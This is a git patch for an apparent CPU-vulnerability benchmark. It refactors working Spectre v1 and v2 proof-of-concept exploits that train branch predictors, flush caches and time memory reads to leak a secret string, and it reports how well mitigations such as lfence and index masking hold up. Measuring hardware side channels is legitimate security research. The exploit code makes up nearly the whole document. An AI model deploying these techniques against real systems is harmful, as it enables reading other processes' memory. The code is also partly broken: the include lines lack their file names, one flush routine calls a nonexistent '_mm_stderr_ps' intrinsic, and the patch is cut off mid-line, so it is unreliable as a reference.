From 47946f6aed078f6769f4f4233ce6543faf974c75 Mon Sep 17 00:00:00 2001 From: Samuel Aubertin Date: Fri, 28 Jan 2022 16:33:17 +0100 Subject: [PATCH] Final touch: style and tabulations. --- Makefile | 6 +- octopus.h | 144 ++++++++++++++++ spectre_v1.c | 471 ++++++++++++++++----------------------------------- spectre_v2.c | 393 ++++++++++++------------------------------ 4 files changed, 400 insertions(+), 614 deletions(-) create mode 100644 octopus.h diff --git a/Makefile b/Makefile index fb1141f..af72e71 100644 --- a/Makefile +++ b/Makefile @@ -34,11 +34,11 @@ LDFLAGS= -fuse-ld=lld CCS= clang gcc OPTIMIZATIONS= 0 1 2 3 fast s RETPOLINE= mretpoline -UUID:= $(shell uuid) +UUID:= $(shell uuid || uuidgen) RESULTS_FILE:= results-$(UUID).json SSH_KEY= octoupload TIMES= 3 -FLAGS= -j +OCTOFLAGS= -j ### Octopus internals CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}') @@ -148,7 +148,7 @@ $(RESULTS_FILE): build for p in $(PROGS); do \ for t in $$(seq $(TIMES)); do \ sleep 0.1; \ - (taskset 01 ./$$p $(FLAGS) || printf "{ \"$$p\": false }")>> $@; \ + (taskset 01 ./$$p $(OCTOFLAGS) || printf "{ \"$$p\": false }")>> $@; \ if ! [ "$$p" = "$(lastword $(PROGS))" ]; \ then echo ',' >> $@; \ else if ! [ $$t -eq $(TIMES) ]; \ diff --git a/octopus.h b/octopus.h new file mode 100644 index 0000000..f4dd7f3 --- /dev/null +++ b/octopus.h @@ -0,0 +1,144 @@ +#include +#include +#include +#include +#include +#include + +#if defined(__i386__) || defined(__amd64__) + #define CACHELINE_SIZE 64 +#else + #error "unsupported architecture" +#endif + +#if defined(__SSE__) && !defined(__SSE2__) + #define NOSSE2 +#endif + +#ifdef NOSSE2 + #define NORDTSCP + #define NOMFENCE + #define NOCLFLUSH +#endif //NOSSE2 + +#ifndef NORDTSCP + #define LATENCY 42 + 42 +#else + #ifndef NOMFENCE + #define LATENCY 18 + 18 + #endif +#endif + +#ifdef MASKING_MITIGATION + /* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 + * + * array_index_mask_nospec() - generate a mask that is ~0UL when the + * bounds check succeeds and 0 otherwise + * @index: array element index + * @size: number of elements in array + * + * Returns: + * 0 - (index < size) + */ + static inline unsigned long + array_index_mask_nospec(unsigned long index, unsigned long size) + { + unsigned long mask; + __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;" + :"=r" (mask) + :"g"(size),"r" (index) + :"cc"); + return mask; + } +#endif //MASKING_MITIGATION + +#ifdef NOCLFLUSH + #define CACHE_FLUSH_ITERATIONS 2048 + #define CACHE_FLUSH_STRIDE 4096 + + uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; + + /* Flush memory using long SSE instructions */ + void + flush_memory_sse(uint8_t * addr) + { + float* p = (float *)addr; + float c = 0.f; + __m128 i = _mm_setr_ps(c, c, c, c); + + int k, l; + /* Non-sequential memory addressing by looping through k by l */ + for (k = 0; k < 4; k++) + for (l = 0; l < 4; l++) + _mm_stderr_ps(&p[(l * 4 + k) * 4], i); + } +#endif //NOCLFLUSH + +static inline unsigned +timed_access(volatile uint8_t *addr) +{ + uint64_t t0, t1; + #pragma GCC diagnostic ignored "-Wuninitialized" + unsigned int junk = junk; + #ifndef NORDTSCP + t0 = __rdtscp(& junk); + junk |= *addr; + t1 = __rdtscp(& junk); + #else + #ifndef NOMFENCE + /* + Since the rdstc instruction isn't serialized, newer processors will try to + reorder it, ruining its value as a timing mechanism. + To get around this, we use the mfence instruction to introduce a memory + barrier and force serialization. mfence is used because it is portable across + Intel and AMD. + */ + _mm_mfence(); + t0 = __rdtsc(); + _mm_mfence(); + junk = *addr; + _mm_mfence(); + t1 = __rdtsc(); + _mm_mfence(); + #else + /* + The mfence instruction was introduced with the SSE2 instruction set, so + we have to ifdef it out on pre-SSE2 processors. + Luckily, these older processors don't seem to reorder the rdtsc instruction, + so not having mfence on older processors is less of an issue. + */ + t0 = __rdtsc(); + junk |= *addr; + t1 = __rdtsc(); + #endif // NOMFENCE + #endif // NORDTSCP + return (unsigned)(t1 - t0 - LATENCY); +} + +static void +calibrate_threshold(unsigned int *threshold) +{ + volatile char buf[2 * CACHELINE_SIZE]; + volatile uint8_t* bufp; + int i; + const int cnt = 10000; + uint64_t tcache = 0; + __attribute__((unused)) + volatile int junk = 0; + + bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1))); + + junk |= *bufp; + + for (i = 0, tcache = 0; i < cnt; i++) { + tcache += timed_access(bufp); + } + tcache = tcache / cnt; + + if (threshold != NULL) { + *threshold = tcache + LATENCY; + } + return; +} + + diff --git a/spectre_v1.c b/spectre_v1.c index ca17f77..23d3430 100644 --- a/spectre_v1.c +++ b/spectre_v1.c @@ -19,332 +19,148 @@ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ -#include -#include -#include -#include -#include -#include /* for rdtscp and clflush */ +#include "octopus.h" -#if defined(__i386__) || defined(__amd64__) -#define CACHELINE_SIZE 64 -#else -#error "unsupported architecture" -#endif - -#if defined(__SSE__) && !defined(__SSE2__) -#define NOSSE2 -#endif - -#ifdef NOSSE2 -#define NORDTSCP -#define NOMFENCE -#define NOCLFLUSH -#endif //NOSSE2 - -#ifndef NORDTSCP -#define LATENCY 42 + 42 -#else -#ifndef NOMFENCE -#define LATENCY 18 + 18 -#endif -#endif - -#ifdef MASKING_MITIGATION -/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 - * - * array_index_mask_nospec() - generate a mask that is ~0UL when the - * bounds check succeeds and 0 otherwise - * @index: array element index - * @size: number of elements in array - * - * Returns: - * 0 - (index < size) - */ -static inline unsigned long -array_index_mask_nospec( - unsigned long index, - unsigned long size - ) -{ - unsigned long mask; - __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;" - :"=r" (mask) - :"g"(size),"r" (index) - :"cc"); - return mask; -} -#endif //MASKING_MITIGATION - -#ifdef NOCLFLUSH -#define CACHE_FLUSH_ITERATIONS 2048 -#define CACHE_FLUSH_STRIDE 4096 - -uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; - -/* Flush memory using long SSE instructions */ -void -flush_memory_sse( - uint8_t * addr - ) -{ - float * p = (float *)addr; - float c = 0.f; - __m128 i = _mm_setr_ps(c, c, c, c); - - int k, l; - /* Non-sequential memory addressing by looping through k by l */ - for (k = 0; k < 4; k++) - for (l = 0; l < 4; l++) - _mm_stderr_ps(&p[(l * 4 + k) * 4], i); -} -#endif //NOCLFLUSH - -char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; - - -unsigned int array1_size = 16; -uint8_t unused1[64]; -uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; -uint8_t unused2[64]; -uint8_t array2[256 * 512]; -uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ -unsigned cache_hit_threshold; - - - -static inline unsigned -timed_access( - volatile uint8_t *addr - ) -{ - uint64_t t0, t1; - #pragma GCC diagnostic ignored "-Wuninitialized" - unsigned int junk = junk; - #ifndef NORDTSCP - t0 = __rdtscp(& junk); - junk |= *addr; - t1 = __rdtscp(& junk); - #else - #ifndef NOMFENCE - /* - Since the rdstc instruction isn't serialized, newer processors will try to - reorder it, ruining its value as a timing mechanism. - To get around this, we use the mfence instruction to introduce a memory - barrier and force serialization. mfence is used because it is portable across - Intel and AMD. - */ - _mm_mfence(); - t0 = __rdtsc(); - _mm_mfence(); - junk = * addr; - _mm_mfence(); - t1 = __rdtsc(); - _mm_mfence(); - - #else - /* - The mfence instruction was introduced with the SSE2 instruction set, so - we have to ifdef it out on pre-SSE2 processors. - Luckily, these older processors don't seem to reorder the rdtsc instruction, - so not having mfence on older processors is less of an issue. - */ - t0 = __rdtsc(); - junk |= *addr; - t1 = __rdtsc(); - #endif // NOMFENCE - #endif // NORDTSCP - return (unsigned)(t1 - t0 - LATENCY); -} - -static void -calibrate_threshold( - unsigned int *threshold - ) -{ - volatile char buf[2 * CACHELINE_SIZE]; - volatile uint8_t *bufp; - int i; - const int cnt = 10000; - uint64_t tcache = 0; - __attribute__((unused)) - volatile int junk = 0; - - bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & - ~(CACHELINE_SIZE - 1))); - - junk |= *bufp; - - for (i = 0, tcache = 0; i < cnt; i++) { - tcache += timed_access(bufp); - } - tcache = tcache / cnt; - - if (threshold != NULL) { - *threshold = tcache + LATENCY; - } - return; -} +char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; +unsigned int cache_hit_threshold, array1_size = 16; +uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; +uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ void -victim_function( - size_t x - ) +victim_function(size_t x) { - if (x < array1_size) { + if (x < array1_size) { #ifdef LFENCE_MITIGATION - /* - * According to Intel et al, the best way to mitigate this is to - * add a serializing instruction after the boundary check to force - * the retirement of previous instructions before proceeding to - * the read. - * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf - */ - _mm_lfence(); + /* + * According to Intel et al, the best way to mitigate this is to + * add a serializing instruction after the boundary check to force + * the retirement of previous instructions before proceeding to + * the read. + * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf + */ + _mm_lfence(); #endif #ifdef MASKING_MITIGATION - x &= array_index_mask_nospec(x, array1_size); + x &= array_index_mask_nospec(x, array1_size); #endif - temp &= array2[array1[x] * 512]; - } + + temp &= array2[array1[x] * 512]; + } } void -leak( - size_t malicious_x, - uint8_t value[2], - int score[2], - unsigned cache_hit_threshold - ) +leak(size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold) { static int results[256]; - int tries, i, j, mix_i; - unsigned int junk = 0; - size_t training_x, x; - volatile uint8_t *addr; + int tries, i, j, mix_i, junk = 0; + size_t training_x, x; + volatile uint8_t* addr; #ifdef NOCLFLUSH - int junk2 = 0; - int l; - (void)junk2; + int junk2 = 0; + int l; + (void)junk2; #endif - for (i = 0; i < 256; i++) { results[i] = 0; - } - - for (tries = 999; tries > 0; tries--) { - - #ifndef NOCLFLUSH - /* Flush array2[256*(0..255)] from cache */ - for (i = 0; i < 256; i++) - _mm_clflush(&array2[i * 512]); - #else - /* Flush array2[256*(0..255)] from cache - using long SSE instruction several times */ - for (j = 0; j < 16; j++) { - for (i = 0; i < 256; i++) { - flush_memory_sse( & array2[i * 512]); - } - } - #endif - - /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ - training_x = tries % array1_size; - for (j = 29; j >= 0; j--) { - #ifndef NOCLFLUSH - _mm_clflush(&array1_size); - #else - /* Alternative to using clflush to flush the CPU cache - * Read addresses at 4096-byte intervals out of a large array. - * Do this around 2000 times, or more depending on CPU cache size. */ - for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) { - junk2 = cache_flush_array[l]; - } - #endif - for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ - /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ - /* Avoid jumps in case those tip off the branch predictor */ - x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ - x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ - x = training_x ^ (x & (malicious_x ^ training_x)); - /* Call the victim! */ - victim_function(x); - - } - - /* Time reads. Order is lightly mixed up to prevent stride prediction */ - for (i = 0; i < 256; i++) { - mix_i = ((i * 167) + 13) & 255; - addr = & array2[mix_i * 512]; - if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) - results[mix_i]++; /* cache hit - add +1 to score for this value */ - } - - /* Locate highest results in j */ - j = -1; - for (i = 0; i < 256; i++) { - if (j < 0 || results[i] >= results[j]) { - j = i; - } - } - if (results[j] >= 3) - break; } + for (tries = 999; tries > 0; tries--) { + #ifndef NOCLFLUSH + /* Flush array2[256*(0..255)] from cache */ + for (i = 0; i < 256; i++) + _mm_clflush(&array2[i * 512]); + #else + /* Flush array2[256*(0..255)] from cache + using long SSE instruction several times */ + for (j = 0; j < 16; j++) { + for (i = 0; i < 256; i++) { + flush_memory_sse(&array2[i * 512]); + } + } + #endif + /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ + training_x = tries % array1_size; + for (j = 29; j >= 0; j--) { + #ifndef NOCLFLUSH + _mm_clflush(&array1_size); + #else + /* Alternative to using clflush to flush the CPU cache + * Read addresses at 4096-byte intervals out of a large array. + * Do this around 2000 times, or more depending on CPU cache size. */ + for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) { + junk2 = cache_flush_array[l]; + } + #endif + for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ + /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ + /* Avoid jumps in case those tip off the branch predictor */ + x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ + x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ + x = training_x ^ (x & (malicious_x ^ training_x)); + /* Call the victim! */ + victim_function(x); + } + /* Time reads. Order is lightly mixed up to prevent stride prediction */ + for (i = 0; i < 256; i++) { + mix_i = ((i * 167) + 13) & 255; + addr = & array2[mix_i * 512]; + if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) + results[mix_i]++; /* cache hit - add +1 to score for this value */ + } + /* Locate highest results in j */ + j = -1; + for (i = 0; i < 256; i++) { + if (j < 0 || results[i] >= results[j]) { + j = i; + } + } + if (results[j] >= 3) + break; + } results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; } int -main( - int argc, - char** argv - ) +main(int argc, char** argv) { - int o; size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ - int i, score[2], len = (int)strlen(secret); - uint8_t value[2]; - unsigned successes = 0; - int json = 0; - + int i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0; + uint8_t value[2]; + while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; - case 'j': + case 'j': json++; - break; + break; default: usage: fprintf(stderr, "usage: %s [-j] " - "[-t threshold]\n" - "\t-j\t\tJSON output\n" - "\t-t INT\t\tfixed threshold\n", argv[0]); + "[-t threshold]\n" + "\t-j\t\tJSON output\n" + "\t-t INT\t\tfixed threshold\n", argv[0]); return 1; } } - if (argc != optind) + if (argc != optind) { goto usage; - - fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", - argv[0] + 2, - (int)strlen(secret)); - + } + + fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret)); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); - #ifdef NOCLFLUSH - for (i = 0; i < (int)sizeof(cache_flush_array); i++) { - cache_flush_array[i] = 1; - } + for (i = 0; i < (int)sizeof(cache_flush_array); i++) { + cache_flush_array[i] = 1; + } #endif - - for (i = 0; i < (int)sizeof(array2); i++) + for (i = 0; i < (int)sizeof(array2); i++) { array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ - + } while (--len >= 0) { leak(malicious_x++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { @@ -352,63 +168,60 @@ main( fprintf(stderr, "\033[32m%c\033[0m", (value[0])); } else { fprintf(stderr, "\033[31m?\033[0m"); - } + } } fprintf(stderr, "\n"); if (json) { printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); #ifndef NORDTSCP - printf("\"rdtscp\": true, "); - #else - printf("\"rdtscp\": false, "); - #endif - #ifndef NOMFENCE - printf("\"mfence\": true, "); - #else - printf("\"mfence\": false, "); - #endif - #ifndef NOCLFLUSH - printf("\"clflush\": true "); - #else - printf("\"clflush\": false "); - #endif - printf("}, \"mitigations\": { "); - #ifdef LFENCE_MITIGATION - printf("\"lfence\": true, "); - #else - printf("\"lfence\": false, "); - #endif - #ifdef MASKING_MITIGATION - printf("\"masking\": true "); - #else - printf("\"masking\": false "); - #endif - printf("}, "); + printf("\"rdtscp\": true, "); + #else + printf("\"rdtscp\": false, "); + #endif + #ifndef NOMFENCE + printf("\"mfence\": true, "); + #else + printf("\"mfence\": false, "); + #endif + #ifndef NOCLFLUSH + printf("\"clflush\": true "); + #else + printf("\"clflush\": false "); + #endif + printf("}, \"mitigations\": { "); + #ifdef LFENCE_MITIGATION + printf("\"lfence\": true, "); + #else + printf("\"lfence\": false, "); + #endif + #ifdef MASKING_MITIGATION + printf("\"masking\": true "); + #else + printf("\"masking\": false "); + #endif + printf("}, "); printf("\"threshold\": %d, ", cache_hit_threshold); - printf("\"success\": %.0f } }", - 100 * successes / (float)strlen(secret)); + printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret)); } fprintf(stderr, "[+] %-27s\t",argv[0] + 2); #ifndef NORDTSCP - fprintf(stderr, "RDTSCP "); - #else - fprintf(stderr, "RDTSC "); - #endif - #ifndef NOMFENCE - fprintf(stderr, "MFENCE "); - #endif - #ifndef NOCLFLUSH - fprintf(stderr, "CLFLUSH "); - #endif - #ifdef LFENCE_MITIGATION - fprintf(stderr, "LFENCE_MITIGATION "); - #endif - #ifdef MASKING_MITIGATION - fprintf(stderr, "MASKING_MITIGATION "); - #endif - fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", - cache_hit_threshold, - 100 * successes / (float)strlen(secret)); + fprintf(stderr, "RDTSCP "); + #else + fprintf(stderr, "RDTSC "); + #endif + #ifndef NOMFENCE + fprintf(stderr, "MFENCE "); + #endif + #ifndef NOCLFLUSH + fprintf(stderr, "CLFLUSH "); + #endif + #ifdef LFENCE_MITIGATION + fprintf(stderr, "LFENCE_MITIGATION "); + #endif + #ifdef MASKING_MITIGATION + fprintf(stderr, "MASKING_MITIGATION "); + #endif + fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret)); return 0; } diff --git a/spectre_v2.c b/spectre_v2.c index 1e44bd9..bf0aa3a 100644 --- a/spectre_v2.c +++ b/spectre_v2.c @@ -18,83 +18,20 @@ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ -#include -#include -#include -#include -#include -#include /* for rdtscp and clflush */ - -#if defined(__i386__) || defined(__amd64__) -#define CACHELINE_SIZE 64 -#else -#error "unsupported architecture" -#endif - -#if defined(__SSE__) && !defined(__SSE2__) -#define NOSSE2 -#endif - -#ifdef NOSSE2 -#define NORDTSCP -#define NOMFENCE -#define NOCLFLUSH -#endif //NOSSE2 - -#ifndef NORDTSCP -#define LATENCY 42 + 42 -#else -#ifndef NOMFENCE -#define LATENCY 18 + 18 -#endif -#endif +#include "octopus.h" #define GAP 1024 - - -#ifdef NOCLFLUSH -#define CACHE_FLUSH_ITERATIONS 2048 -#define CACHE_FLUSH_STRIDE 4096 - -uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; - -/* Flush memory using long SSE instructions */ -void -flush_memory_sse( - uint8_t * addr - ) -{ - float * p = (float *)addr; - float c = 0.f; - __m128 i = _mm_setr_ps(c, c, c, c); - - int k, l; - /* Non-sequential memory addressing by looping through k by l */ - for (k = 0; k < 4; k++) - for (l = 0; l < 4; l++) - _mm_stderr_ps(&p[(l * 4 + k) * 4], i); -} -#endif //NOCLFLUSH - - char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; -uint8_t channel[256 * GAP]; // side channel to extract secret phrase -uint64_t *target; // pointer to indirect call target - -unsigned int array1_size = 16; -uint8_t unused1[64]; -uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; -uint8_t unused2[64]; -uint8_t array2[256 * 512]; +uint64_t* target; // pointer to indirect call target +unsigned int cache_hit_threshold, array1_size = 16; +uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ -unsigned cache_hit_threshold; +uint8_t channel[256 * GAP]; // side channel to extract secret phrase // mistrained target of indirect call int -gadget( - char *addr - ) +gadget(char* addr) { return channel[*addr * GAP]; // speculative loads fetch data into the cache } @@ -106,89 +43,13 @@ safe_target() return 42; } -static inline unsigned -timed_access( - volatile uint8_t *addr - ) -{ - uint64_t t0, t1; - #pragma GCC diagnostic ignored "-Wuninitialized" - unsigned int junk; - #ifndef NORDTSCP - t0 = __rdtscp(& junk); - junk |= *addr; - t1 = __rdtscp(& junk); - #else - #ifndef NOMFENCE - /* - Since the rdstc instruction isn't serialized, newer processors will try to - reorder it, ruining its value as a timing mechanism. - To get around this, we use the mfence instruction to introduce a memory - barrier and force serialization. mfence is used because it is portable across - Intel and AMD. - */ - _mm_mfence(); - t0 = __rdtsc(); - _mm_mfence(); - junk = * addr; - _mm_mfence(); - t1 = __rdtsc(); - _mm_mfence(); - - #else - /* - The mfence instruction was introduced with the SSE2 instruction set, so - we have to ifdef it out on pre-SSE2 processors. - Luckily, these older processors don't seem to reorder the rdtsc instruction, - so not having mfence on older processors is less of an issue. - */ - t0 = __rdtsc(); - junk |= *addr; - t1 = __rdtsc(); - #endif // NOMFENCE - #endif // NORDTSCP - return (unsigned)(t1 - t0 - LATENCY); -} - -static void -calibrate_threshold( - unsigned int *threshold - ) -{ - volatile char buf[2 * CACHELINE_SIZE]; - volatile uint8_t *bufp; - int i; - const int cnt = 10000; - uint64_t tcache = 0; - __attribute__((unused)) - volatile int junk = 0; - - bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & - ~(CACHELINE_SIZE - 1))); - - junk |= *bufp; - - for (i = 0, tcache = 0; i < cnt; i++) { - tcache += timed_access(bufp); - } - tcache = tcache / cnt; - - if (threshold != NULL) { - *threshold = tcache + LATENCY; - } - return; -} - // function that makes indirect call // note that addr will be passed to gadget via %rdi int -victim_function( - char *addr, - int input - ) +victim_function(char* addr, int input) { - #pragma GCC diagnostic ignored "-Wuninitialized" - unsigned int junk = junk; + #pragma GCC diagnostic ignored "-Wuninitialized" + unsigned int result, junk = junk; // set up branch history buffer (bhb) by performing >29 taken branches // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html // for details about how the branch prediction mechanism works @@ -197,171 +58,142 @@ victim_function( input += i; junk += input & i; } - - int result; // call *target __asm volatile("callq *%1\n" - "mov %%eax, %0\n" - : "=r" (result) - : "r" (*target) - : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); + "mov %%eax, %0\n" + : "=r" (result) + : "r" (*target) + : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); return result & junk; } static inline void -leak( - char *target_addr, - uint8_t value[2], - int score[2], - unsigned cache_hit_threshold - ) +leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold) { static int results[256]; - int tries, i, j, mix_i; - unsigned int junk = 0; - volatile uint8_t *addr; + int tries, i, j, mix_i; + unsigned int junk = 0; + volatile uint8_t* addr; char dummy = '@'; - #ifdef NOCLFLUSH - int junk2 = 0; - int l; - (void)junk2; + int junk2 = 0; + int l; + (void)junk2; #endif - for (i = 0; i < 256; i++) { results[i] = 0; channel[i * GAP] = 1; - } - + } for (tries = 999; tries > 0; tries--) { *target = (uint64_t)&gadget; #ifndef NOMFENCE _mm_mfence(); #endif - for (j = 50; j > 0; j--) { - junk ^= victim_function(&dummy, 0); - } + junk ^= victim_function(&dummy, 0); + } - #ifndef NOMFENCE - _mm_mfence(); + #ifndef NOMFENCE + _mm_mfence(); #endif #ifndef NOCLFLUSH - for (i = 0; i < 256; i++) - _mm_clflush(&channel[i * GAP]); + for (i = 0; i < 256; i++) { + _mm_clflush(&channel[i * GAP]); + } #else - for (j = 0; j < 16; j++) { - for (i = 0; i < 256; i++) { - flush_memory_sse(&channel[i * GAP]); - } - } + for (j = 0; j < 16; j++) { + for (i = 0; i < 256; i++) { + flush_memory_sse(&channel[i * GAP]); + } + } #endif - #ifndef NOMFENCE - _mm_mfence(); - #endif - - // change to safe target - *target = (uint64_t)&safe_target; #ifndef NOMFENCE - _mm_mfence(); - #endif + _mm_mfence(); + #endif + + // change to safe target + *target = (uint64_t)&safe_target; + #ifndef NOMFENCE + _mm_mfence(); + #endif // flush target to prolong misprediction interval #ifndef NOCLFLUSH - _mm_clflush((void*) target); + _mm_clflush((void*) target); #else + flush_memory_sse((void*) target); #endif #ifndef NOMFENCE - _mm_mfence(); + _mm_mfence(); #endif - // call victim - junk ^= victim_function(target_addr, 0); - #ifndef NOMFENCE - _mm_mfence(); + junk ^= victim_function(target_addr, 0); + #ifndef NOMFENCE + _mm_mfence(); #endif - - - // now, the value of *addr_to_read should be cached even though - // the logical execution path never calls gadget() - - // time reads, mix up order to prevent stride prediction - - - /* Time reads. Order is lightly mixed up to prevent stride prediction */ - for (i = 0; i < 256; i++) { - mix_i = ((i * 167) + 13) & 255; - addr = & channel[mix_i * GAP]; - if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) - results[mix_i]++; /* cache hit - add +1 to score for this value */ - } - - /* Locate highest results in j */ - j = -1; - for (i = 0; i < 256; i++) { - if (j < 0 || results[i] >= results[j]) { - j = i; - } - } - if (results[j] >= 3) - break; + // now, the value of *addr_to_read should be cached even though + // the logical execution path never calls gadget() + /* Time reads. Order is lightly mixed up to prevent stride prediction */ + for (i = 0; i < 256; i++) { + mix_i = ((i * 167) + 13) & 255; + addr = & channel[mix_i * GAP]; + if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) { + results[mix_i]++; /* cache hit - add +1 to score for this value */ + } + } + /* Locate highest results in j */ + j = -1; + for (i = 0; i < 256; i++) { + if (j < 0 || results[i] >= results[j]) { + j = i; + } + } + if (results[j] >= 3) { + break; + } } - results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; } int -main( - int argc, - char** argv - ) +main(int argc, char** argv) { - target = (uint64_t*)malloc(sizeof(uint64_t)); - int o; - //size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ - int score[2], len = (int)strlen(secret); - uint8_t value[2]; - unsigned successes = 0; - int json = 0; - char *addr = secret; - + int o, score[2], len = (int)strlen(secret), json = 0, successes = 0; + uint8_t value[2]; + char* addr = secret; + while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; - case 'j': + case 'j': json++; - break; + break; default: usage: fprintf(stderr, "usage: %s [-j] " - "[-t threshold]\n" - "\t-j\t\tJSON output\n" - "\t-t INT\t\tfixed threshold\n", argv[0]); + "[-t threshold]\n" + "\t-j\t\tJSON output\n" + "\t-t INT\t\tfixed threshold\n", argv[0]); return 1; } } - if (argc != optind) + if (argc != optind) { goto usage; + } - fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", - argv[0] + 2, - len); - + target = (uint64_t*)malloc(sizeof(uint64_t)); + fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); #ifdef NOCLFLUSH - for (i = 0; i < (int)sizeof(cache_flush_array); i++) { - cache_flush_array[i] = 1; - } + for (i = 0; i < (int)sizeof(cache_flush_array); i++) { + cache_flush_array[i] = 1; + } #endif - - //for (i = 0; i < (int)sizeof(array2); i++) - // array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ - while (--len >= 0) { leak(addr++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { @@ -375,40 +207,37 @@ main( if (json) { printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); #ifndef NORDTSCP - printf("\"rdtscp\": true, "); - #else - printf("\"rdtscp\": false, "); - #endif - #ifndef NOMFENCE - printf("\"mfence\": true, "); - #else - printf("\"mfence\": false, "); - #endif - #ifndef NOCLFLUSH - printf("\"clflush\": true "); - #else - printf("\"clflush\": false "); - #endif - printf("}, "); + printf("\"rdtscp\": true, "); + #else + printf("\"rdtscp\": false, "); + #endif + #ifndef NOMFENCE + printf("\"mfence\": true, "); + #else + printf("\"mfence\": false, "); + #endif + #ifndef NOCLFLUSH + printf("\"clflush\": true "); + #else + printf("\"clflush\": false "); + #endif + printf("}, "); printf("\"threshold\": %d, ", cache_hit_threshold); - printf("\"success\": %.0f } }", - 100 * successes / (float)strlen(secret)); + printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret)); } fprintf(stderr, "[+] 